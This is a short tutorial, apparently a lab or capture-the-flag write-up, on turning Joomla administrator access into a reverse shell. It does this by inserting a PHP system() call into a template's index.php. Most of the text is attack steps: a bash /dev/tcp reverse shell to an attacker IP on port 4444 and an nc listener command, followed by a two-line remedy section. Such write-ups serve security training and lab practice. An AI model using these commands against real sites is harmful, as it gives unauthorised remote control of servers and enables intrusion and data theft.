This article explains how to create a reverse shell in Joomla platform
1. Log into Joomla platform
- http://dev.devvortex.htb/administrator/
2. Having access to the Jommla Administrator dashboard navigate to System->Templates->Administrator Templates
- Select the template you want to edit
3. Go to Index.php (or any other page that is executed)
4. Insert your PHP code in here, and click on save
- system(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.166/4444 0>&1′”);
Note: In this case I added a reverse shell, you can use echo first to try to make sure a string is printed and the code executed
- echo “Vry4n was here!”;
5. Start a listener in your local machine
- nc -lvp 4444
6. Refresh the Joomla Administrator page, and, you should receive a reverse shell
Remedy
Ensure administrators use strong passwords
Grant administrator access only to users that require it